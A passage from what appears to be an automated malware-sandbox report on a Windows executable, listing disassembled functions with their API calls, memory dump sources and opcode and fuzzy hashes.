                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __flush.LIBCMT ref: 00414630
                                                                                                                                                                                                                                                                                                                                                                                                                • __fileno.LIBCMT ref: 00414650
                                                                                                                                                                                                                                                                                                                                                                                                                • __locking.LIBCMT ref: 00414657
                                                                                                                                                                                                                                                                                                                                                                                                                • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2286883814-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                                                                                                                                                                                                                                                                                                                • #21.WSOCK32 ref: 004740E0
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                                                                                                                                                                                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004505BF
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2351499541-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00461461
                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 004614AB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
